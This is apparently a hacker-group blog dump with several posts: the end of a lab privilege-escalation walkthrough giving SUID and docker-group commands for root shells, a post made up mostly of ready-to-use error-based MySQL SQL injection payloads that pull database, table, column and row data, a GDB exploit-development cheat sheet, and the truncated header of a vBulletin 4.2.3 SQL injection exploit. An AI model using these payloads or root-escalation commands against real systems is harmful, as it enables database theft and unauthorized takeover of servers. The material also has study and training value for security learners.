<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdwLENXoVAS52G2ZwekQIRIsO0hZzJWjuvZfG8Vwd3LHcnpjUTWlJHrb3NOdQJmgb28nS2rhNIZHwMlfGgv1700rDj9k5yuLn3CuPGTKzLJWYfwUFSxhrqA9usW2e8nbjr4pb5rH46ztE/s1600/before+chmod.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="541" data-original-width="1042" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdwLENXoVAS52G2ZwekQIRIsO0hZzJWjuvZfG8Vwd3LHcnpjUTWlJHrb3NOdQJmgb28nS2rhNIZHwMlfGgv1700rDj9k5yuLn3CuPGTKzLJWYfwUFSxhrqA9usW2e8nbjr4pb5rH46ztE/s1600/before+chmod.png" /></a></div>
<br />
Let's check whether binary is having SUID set on it by listing the permissions of file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3MhzkPVDPbUwnsZZgikHiQRoucwWOR7ylc2-ZJSluUX6vAxX3OsXY5TF6y5UcKsapFMzj46DK6aRKSy1DAjFZSeDTx14NOYRGpXCoi7-e1TkVFHjnJcFafqLIsziYX4VrxOlYlI3OHiQ/s1600/after+chmod.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="643" data-original-width="863" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3MhzkPVDPbUwnsZZgikHiQRoucwWOR7ylc2-ZJSluUX6vAxX3OsXY5TF6y5UcKsapFMzj46DK6aRKSy1DAjFZSeDTx14NOYRGpXCoi7-e1TkVFHjnJcFafqLIsziYX4VrxOlYlI3OHiQ/s1600/after+chmod.png" /></a></div>
<br />
Great, now binary is having SUID bit as well set on it. now we just need to execute the binary and as we know that binary owner is "root" user and it is having SUDI bit set on it so we will get "/bin/sh" Shell with privilege of "root" user<br />
Let's execute the binary and check whether we got "root" privilege or not by executing below mentioned command<br />
<br />
<span style="color: #ff9933; font-family: "comic sans ms"; font-size: small;">./r</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCrNR864bqdTeLuQnR_PXnSzHeqe4TSAa5XehkzIgjK2J3_v9fw9kaG6zcT_TGmJeOe7QUnCgXQ5Tf6ovtvvJ4v1xEAv5wvQ06UhVsD0OzR9Rg-K8NH7vztgewLpiZvLuNDoC6q8S2lFE/s1600/got+root.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="743" data-original-width="1220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCrNR864bqdTeLuQnR_PXnSzHeqe4TSAa5XehkzIgjK2J3_v9fw9kaG6zcT_TGmJeOe7QUnCgXQ5Tf6ovtvvJ4v1xEAv5wvQ06UhVsD0OzR9Rg-K8NH7vztgewLpiZvLuNDoC6q8S2lFE/s1600/got+root.png" /></a></div>
<br />
And yes, it worked and now we are in root "/bin/sh" shell :)<br />
<br />
<b>Using Docker</b><br />
Machine is running docker in it and after searching little bit i came to know that if we have access to OS user account which is having membership of "docker" group, we can get root shell by using below mentioned commands<br />
<br />
<span style="color: #ff9933; font-family: "comic sans ms"; font-size: small;">docker run --privileged --interactive --tty --volume /:/host bash<br />
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease</span></div>
<br />
Current user is member of "docker" group<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqUNQpco5glCBzIdbxFE8ajUC_FMRVyY6JZaHXACewfzGDrdhwFzJG2QHtBKLiDPBOObyKB5hB4FUPTtlaAW_7_-t9CHS9U6dMzoeWenDMWxaF_YSnSmZKsuOFFTykIJihKT6rLyap2T4/s1600/user+priv.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="91" data-original-width="701" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqUNQpco5glCBzIdbxFE8ajUC_FMRVyY6JZaHXACewfzGDrdhwFzJG2QHtBKLiDPBOObyKB5hB4FUPTtlaAW_7_-t9CHS9U6dMzoeWenDMWxaF_YSnSmZKsuOFFTykIJihKT6rLyap2T4/s1600/user+priv.png" /></a></div>
<br />
Let's get root shell using above mentioned commands xD<br />
<br />
Using first command<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmHPynoZHHS2LRlGprb3PZsqrnfCrkSPZReJ5ZnCNuAVmDvVahFgxnGDrtuPjj_LPxADmLmbINU1TmNCTdSqFVLMq7JM2mcYZiRXUuzmoIq2FISracOigQpPptNvB5NB_Ma46FpoWeHxs/s1600/docker1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="252" data-original-width="1331" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmHPynoZHHS2LRlGprb3PZsqrnfCrkSPZReJ5ZnCNuAVmDvVahFgxnGDrtuPjj_LPxADmLmbINU1TmNCTdSqFVLMq7JM2mcYZiRXUuzmoIq2FISracOigQpPptNvB5NB_Ma46FpoWeHxs/s1600/docker1.png" /></a></div>
<br />
Using second command<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFvi1kqGUxgLOj-6cUbI8I526foanpu83v0rrutpVg2kDCbw5AmhUtevvgGeSXRb35yxxTLd8ndIq27wT9Ox3DCy-HeEDgnfeamqMviNMVMEIFSen9rXcnPpduFxmjJ1tgQzHo-Z0E2SI/s1600/docker2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="477" data-original-width="1211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFvi1kqGUxgLOj-6cUbI8I526foanpu83v0rrutpVg2kDCbw5AmhUtevvgGeSXRb35yxxTLd8ndIq27wT9Ox3DCy-HeEDgnfeamqMviNMVMEIFSen9rXcnPpduFxmjJ1tgQzHo-Z0E2SI/s1600/docker2.png" /></a></div>
<br />
<br />
As machine designer mentioned that there are multiple ways to get "root" privilege on the machine so try to get another ways as well.<br />
<br />
Thanks for reading.<br />
<br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;">--==[[ With Love from Team IndiShell ]]==--</span><br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;"> </span><br />
<div class="line number44 index43 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[ Greetz To ]]==--</code></div>
<div class="line number45 index44 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">############################################################################################</code></div>
<div class="line number46 index45 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,</code></div>
<div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,</code></div>
<div class="line number48 index47 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Hackuin,Alicks,mike waals,Dinelson Amine, cyber gladiator,Cyber Ace,Golden boy INDIA,</code></div>
<div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash, D3</code></div>
<div class="line number50 index49 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#############################################################################################</code></div>
<div class="line number51 index50 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[Love to]]==--</code></div>
<div class="line number52 index51 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain"># My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, Anurag, Cyber Warrior</code></div>
<div class="line number53 index52 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
<br />
<br /></div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-33446857159666703182018-03-05T00:25:00.000+05:302019-05-24T17:04:49.397+05:30Erro based SQL Injection - MySQL <div dir="ltr" style="text-align: left;" trbidi="on">
Pranaam to All _/\_<br />
<br />
This blog post is about exploiting error based SQL Injection (only for MySQL database).<br />
<br />
Normal SQL Injection:<br />
<br />
<b>Case 1 - Integer Based</b><br />
<br />
<u>Database Name extraction</u> <br />
-> and (select 1 FROM(select count(*),concat((select (select concat(0x7e7e,database(),0x7e7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)<b> </b><br />
<br />
<u>Table name extraction</u><br />
-> and (select 1 FROM(select count(*),concat((select (select concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) <br />
<br />
To extract next table name, change value in limit clause from 0,1 to 1,1 and so on<br />
<br />
<br />
<u>Column name extraction</u><br />
-> and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select column_name from information_schema.columns where table_schema=database() limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) <br />
<br />
To extract next column name, change value in limit clause from 0,1 to 1,1 and so on<br />
<br />
<br />
<u>Data extraction</u><br />
-> and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select user from data limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) <br />
<br />
In my case column name is "user" and table name is "data", replace it appropriate column name and table name so that you can extract data.<br />
<br />
<br />
<b>Case 1 - String Based</b><br />
<br />
<u>Database Name extraction</u> <br />
->
' and (select 1 FROM(select count(*),concat((select (select
concat(0x7e7e,database(),0x7e7e)) FROM information_schema.tables LIMIT
0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) and 1<'2<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX8ofHe9ZIrm9mXIrLCRBAGFRRTOLIBImK1d5fIH2vjaq4nvi6Omm8hKROidp4jd4iHpn45TUHHR0Psn0k8LLlvGJQi59vA92FaLL-MEiZv3VypzGIYmYbMvTSxF843p8FPKyu0naLp-4/s1600/database+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="559" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX8ofHe9ZIrm9mXIrLCRBAGFRRTOLIBImK1d5fIH2vjaq4nvi6Omm8hKROidp4jd4iHpn45TUHHR0Psn0k8LLlvGJQi59vA92FaLL-MEiZv3VypzGIYmYbMvTSxF843p8FPKyu0naLp-4/s1600/database+1.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<br />
<u>Table name extraction</u><br />
->
' and (select 1 FROM(select count(*),concat((select (select
concat(0x7e,(select table_name from information_schema.tables where
table_schema=database() limit 0,1),0x7e))),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a) and 1<'2<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-ozKi17bbLT1ip0y6Sbku0ua94kbDQG172VWwWRUGVMIob8i1526gNKf2niwE_XkL5tZsdbUWaMiRvVzbXEE9Hj0bSeEgEJfKRcRCHRDmwg2-pC-IrqLMHM8yeYNOWRXiajLm-w0ozOI/s1600/table+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="677" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-ozKi17bbLT1ip0y6Sbku0ua94kbDQG172VWwWRUGVMIob8i1526gNKf2niwE_XkL5tZsdbUWaMiRvVzbXEE9Hj0bSeEgEJfKRcRCHRDmwg2-pC-IrqLMHM8yeYNOWRXiajLm-w0ozOI/s1600/table+1.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<br />
To extract next table name, change value in limit clause from 0,1 to 1,1 and so on<br />
<br />
<u>Column name extraction</u><br />
->
' and(select 1 FROM(select count(*),concat((select (select
concat(0x7e,(select column_name from information_schema.columns where
table_schema=database() limit 1,1),0x7e))),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a) and 1<'2<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5ewLvdwunAT7sr38GjO0XhLTrs3vrPyIfT7QTzEu2YruGrwJy_HQaEPB2vKFg1hOR6_HEj74yYsXtRXJslY1jQfRZrwroNxvPJ0itEdh7t3vxDO1BB5hRQOLiFSbmmB3PclttyffRCXg/s1600/column+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="570" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5ewLvdwunAT7sr38GjO0XhLTrs3vrPyIfT7QTzEu2YruGrwJy_HQaEPB2vKFg1hOR6_HEj74yYsXtRXJslY1jQfRZrwroNxvPJ0itEdh7t3vxDO1BB5hRQOLiFSbmmB3PclttyffRCXg/s1600/column+1.png" /></a></div>
<div style="text-align: center;">
</div>
<br />
To extract next column name, change value in limit clause from 0,1 to 1,1 and so on<br />
<br />
<u>Data extraction</u><br />
->
' and(select 1 FROM(select count(*),concat((select (select
concat(0x7e,(select user from data limit 1,1),0x7e))),floor(rand(0)*2))x
FROM information_schema.tables GROUP BY x)a) and 1<'2<br />
<br />
In
my case column name is "user" and table name is "data", replace it
appropriate column name and table name so that you can extract data.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4Sen0A0F1bcWzuhsPcilbofoipbIVELbrh4yWZ7JnAX3sAi_S95yuad2o34IF2LPhRTAG6Dju4bHsyugZPawfDeikTTsrPzDAmQrZdKZOwbMMTlpEE86G1bwHq1P7DI1b7supu4RtRG0/s1600/data+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="651" data-original-width="1402" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4Sen0A0F1bcWzuhsPcilbofoipbIVELbrh4yWZ7JnAX3sAi_S95yuad2o34IF2LPhRTAG6Dju4bHsyugZPawfDeikTTsrPzDAmQrZdKZOwbMMTlpEE86G1bwHq1P7DI1b7supu4RtRG0/s1600/data+1.png" /></a></div>
<br />
<br />
<b>Case 2 - String Based (using extractvalue function)</b><br />
<br />
<u>Database Name extraction</u><br />
-> ' and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 1,1),0x7e )) and 1<'2<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguEvPb4J9TR53b7eGPhdY-VhVUekaNuWCAE5v7jYp2z9xtkTMxrtJH5_Lx7xpdPi7dsV_a-r73hECk0AELpMeoZ7GTJ1Y4YL_6J8jib8GH6yjToFadYIjKlE3jjAJyZn1Atyl-JRqb48M/s1600/database+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="666" data-original-width="1282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguEvPb4J9TR53b7eGPhdY-VhVUekaNuWCAE5v7jYp2z9xtkTMxrtJH5_Lx7xpdPi7dsV_a-r73hECk0AELpMeoZ7GTJ1Y4YL_6J8jib8GH6yjToFadYIjKlE3jjAJyZn1Atyl-JRqb48M/s1600/database+2.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<u>Table name extraction</u><br />
-> ' and
extractvalue(6678,concat(0x7e,(select table_name from
information_schema.tables where table_schema=database() LIMIT 1,1),0x7e
)) and 1<'2<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6LkVjSSu8uQbO_wIW9yslKuiF04koGbUlzAfqwJqDsktFntkoqH4eidz28pyQZZFGo0InB1jrY3_qLEvB3mEsAdKds-evIZxnkef3Tow6rHMZ-NkCbqfCpJT3ZjoY0x8peKkS6fDy3a0/s1600/table+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="639" data-original-width="1281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6LkVjSSu8uQbO_wIW9yslKuiF04koGbUlzAfqwJqDsktFntkoqH4eidz28pyQZZFGo0InB1jrY3_qLEvB3mEsAdKds-evIZxnkef3Tow6rHMZ-NkCbqfCpJT3ZjoY0x8peKkS6fDy3a0/s1600/table+2.png" /></a></div>
<br />
<u>Column name extraction</u><br />
-> ' and extractvalue(6678,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() LIMIT 0,1),0x7e )) and 1<'2<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4thv_-eQfVZmvQMnXJBjGBzPLWj4SComVaDCwOUJB-v3fV5eeudlFFUyib0FQBTzefa9XhWxDxgzx6tzT33pDLhCbPzF26RJzo8oyr0xkXrG5FgqL7ISux9Gu9ogxnrxWWE8IautC4hQ/s1600/column+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="694" data-original-width="1515" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4thv_-eQfVZmvQMnXJBjGBzPLWj4SComVaDCwOUJB-v3fV5eeudlFFUyib0FQBTzefa9XhWxDxgzx6tzT33pDLhCbPzF26RJzo8oyr0xkXrG5FgqL7ISux9Gu9ogxnrxWWE8IautC4hQ/s1600/column+3.png" /></a></div>
<br />
<u>Data extraction</u><br />
-> ' and extractvalue(6678,concat(0x7e,(select id from data LIMIT 0,1),0x7e )) and 1<'2<br />
<br />
In
my case column name is "id" and table name is "data", replace it
appropriate column name and table name so that you can extract data.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuNHFXT5WhU1eryv-IhMygT5NHey7ClTRyo81wPwR52G0N0HmsBbSbeFwQuBuLfgn-ddvtceHOV0kJlJZ0adS_NBCP4LyPumLYowOL8CO1DKbVGKk2_mTDfZzO4tqPH9IaGvO-Sb_fj0g/s1600/data+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="633" data-original-width="1351" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuNHFXT5WhU1eryv-IhMygT5NHey7ClTRyo81wPwR52G0N0HmsBbSbeFwQuBuLfgn-ddvtceHOV0kJlJZ0adS_NBCP4LyPumLYowOL8CO1DKbVGKk2_mTDfZzO4tqPH9IaGvO-Sb_fj0g/s1600/data+3.png" /></a></div>
<br />
<br />
<b>Case 3 - String Based (using multipolygon function)</b><br />
<br />
<u>Database Name extraction</u> <br />
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,database(),0x7e))a)b))) and 1<'2<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPI6N7q_zihIy7V9w4qsx2cUZbhZ94ZRcX-bAjYEkdZ_O1qoLK-vIYOL4y43D5qxjRrf49-setUMWndI8TCFG8KAWx-Uve00TdR3Uh90avAbGkKak1goY9he20gVAIBprj_qgI1AV23Jc/s1600/database+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="578" data-original-width="1470" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPI6N7q_zihIy7V9w4qsx2cUZbhZ94ZRcX-bAjYEkdZ_O1qoLK-vIYOL4y43D5qxjRrf49-setUMWndI8TCFG8KAWx-Uve00TdR3Uh90avAbGkKak1goY9he20gVAIBprj_qgI1AV23Jc/s1600/database+3.png" /></a></div>
<br />
<u>Table name extraction</u><br />
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema=database() limit 0,1)a)b))) and 1<'2<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG81UhYPIttiylrFm-yJULCCVGJRaUKSMDpuUtioNYwT9M2KSLIsQXCty7iDP6vgTyF7kJrI3vz7EDoMHNc9Niu6J0sMclm5huspPXwSgWXpT5WvDup8vnvUbz1zge3qeSH20UfET1CH0/s1600/table+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="594" data-original-width="1600" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG81UhYPIttiylrFm-yJULCCVGJRaUKSMDpuUtioNYwT9M2KSLIsQXCty7iDP6vgTyF7kJrI3vz7EDoMHNc9Niu6J0sMclm5huspPXwSgWXpT5WvDup8vnvUbz1zge3qeSH20UfET1CH0/s640/table+3.png" width="640" /></a></div>
<br />
<br />
<u>Column name extraction</u><br />
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema=database() limit 0,1)a)b))) and 1<'2<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4thv_-eQfVZmvQMnXJBjGBzPLWj4SComVaDCwOUJB-v3fV5eeudlFFUyib0FQBTzefa9XhWxDxgzx6tzT33pDLhCbPzF26RJzo8oyr0xkXrG5FgqL7ISux9Gu9ogxnrxWWE8IautC4hQ/s1600/column+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="694" data-original-width="1515" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4thv_-eQfVZmvQMnXJBjGBzPLWj4SComVaDCwOUJB-v3fV5eeudlFFUyib0FQBTzefa9XhWxDxgzx6tzT33pDLhCbPzF26RJzo8oyr0xkXrG5FgqL7ISux9Gu9ogxnrxWWE8IautC4hQ/s1600/column+3.png" /></a></div>
<br />
<br />
<u>Data extraction</u><br />
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,id,0x7e,user,0x7e) from data limit 0,1)a)b))) and 1<'2<br />
<u> </u><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuNHFXT5WhU1eryv-IhMygT5NHey7ClTRyo81wPwR52G0N0HmsBbSbeFwQuBuLfgn-ddvtceHOV0kJlJZ0adS_NBCP4LyPumLYowOL8CO1DKbVGKk2_mTDfZzO4tqPH9IaGvO-Sb_fj0g/s1600/data+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="633" data-original-width="1351" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuNHFXT5WhU1eryv-IhMygT5NHey7ClTRyo81wPwR52G0N0HmsBbSbeFwQuBuLfgn-ddvtceHOV0kJlJZ0adS_NBCP4LyPumLYowOL8CO1DKbVGKk2_mTDfZzO4tqPH9IaGvO-Sb_fj0g/s1600/data+3.png" /></a></div>
<u> </u></div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-4496118987816972312017-01-16T15:50:00.000+05:302017-01-16T15:50:15.988+05:30GDB cheat-sheet for exploit development<div dir="ltr" style="text-align: left;" trbidi="on">
Pranaam to all bhai ji _/\_<br />
<br />
Today i am going to share few commands of GDB (GNU Debugger) which comes handy during learning process.<br />
This list is having command commands which ease GDB for beginners.<br />
<br />
File to Disable/enable ASLR<br /> /proc/sys/kernel/randomize_va_space<br /><br /> download PEDA <br /> https://github.com/longld/peda<br /> integrate into gdb <br /> echo "source ~/peda/peda.py" >> ~/.gdbinit<br /> -----<br />| GCC<br /> -----<br />=> compile option to <br /> make stack executable <br /> -z execstack<br /> remove stack guard/canaries <br /> -fno-stack-protector<br /> <br />=> Attach program to GDB <br /> using program executable - > gdb program_file<br /> using running program process ID - > gdb --pid=process_id <br /> <br />=> Show list of command classes <br /> help<br /> help class_of_command <br />=> breakpoint<br /> set break point<br /> break function_name<br /> break memory address<br /> information regarding breakpoint <br /> info breakpoints<br /> info break breakpoint number<br /><br />=> Disassemble a function<br /> disas function_name<br />=> print function list<br /> info func<br />=> Run program with different mode of input<br /> r data<br /> r $(python -c 'some python code')<br /> r < file_having_data<br />=> print value at spcific memory address or in a register<br /> p memory_address/register <br /> different print format<br /> p/x Print as integer variable in hex.<br /> p/d Print variable as a signed integer.<br /> p/u Print variable as a un-signed integer.<br /> p/o Print variable as a octal.<br /> p/c Print integer as character.<br /> p/f Print variable as floating point number.<br /> p/a Print as a hex address.<br /> <br /> => Examine memory space using x<br /> x/format<br /> supported FMT is a repeat count followed by a format letter and a size letter.<br /> Format letters are <br /> o(octal)<br /> x(hex)<br /> d(decimal)<br /> u(unsigned decimal)<br /> t(binary)<br /> f(float)<br /> a(address)<br /> i(instruction)<br /> c(char)<br /> s(string)<br /> and z(hex, zero padded on the left).<br /> Size letters are b(byte), h(halfword), w(word), g(giant, 8 bytes).<br /> example: - x/10s $esp/memory_address or x/10sw $esp/memory_address<br /> x/10s $esp/memory_address-offset <br /> => display current information related to CPU registers<br /> info r<br /> <br /> => execute next instruction <br /> ni<br /> => step inside a function <br /> si<br /> <br /> => set value of register or memory address<br /> set $register = hex_value<br /> <br /> => print memory address of a function <br /> p function name <br /> example: - p system<br /> <br /> => search memory for string <br /> find &system,+9999999,"/bin/sh" (for old gdb)<br /> find "/bin/sh"<br />
<br />
<br />
--==[[ With Love from Team IndiShell ]]==--<br />
<br />
<br />
<br />
<div class="line number44 index43 alt1">
<code class="text spaces"> </code><br />
<code class="text spaces"> </code><code class="text plain">--==[[ Greetz To ]]==--</code></div>
<div class="line number45 index44 alt2">
<code class="text plain">############################################################################################</code></div>
<div class="line number46 index45 alt1">
<code class="text plain">#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,</code></div>
<div class="line number47 index46 alt2">
<code class="text plain">#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,</code></div>
<div class="line number48 index47 alt1">
<code class="text plain">#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,</code></div>
<div class="line number49 index48 alt2">
<code class="text plain">#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash</code></div>
<div class="line number50 index49 alt1">
<code class="text plain">#############################################################################################</code></div>
<div class="line number51 index50 alt2">
<code class="text spaces"> </code><code class="text plain">--==[[Love to]]==--</code></div>
<div class="line number52 index51 alt1">
<code class="text plain"># My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,</code></div>
<div class="line number53 index52 alt2">
<code class="text plain">#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
<br /> </div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-55283435390288663972016-11-13T13:03:00.001+05:302019-05-18T21:19:17.470+05:30vBulletin <=4.2.3 - 'ForumRunner' SQL Injection<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="container">
<div class="line number1 index0 alt2">
<code class="text plain">##################################################################################################</code></div>
<div class="line number2 index1 alt1">
<code class="text plain">#Exploit Title : vBulletin <= 4.2.3 SQL Injection (CVE-2016-6195)</code></div>
<div class="line number3 index2 alt2">
<code class="text plain">#Author : Manish Kishan Tanwar AKA error1046 (https://twitter.com/IndiShell1046)</code></div>
<div class="line number4 index3 alt1">
<code class="text plain">#Date : 25/08/2015</code></div>
<div class="line number5 index4 alt2">
<code class="text plain">#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi</code></div>
<div class="line number6 index5 alt1">
<code class="text plain">#Tested At : Indishell Lab(originally developed by Dantalion)</code></div>
<div class="line number7 index6 alt2">
<code class="text plain">##################################################################################################</code></div>
<div class="line number8 index7 alt1">
<code class="text spaces"> </code> </div>
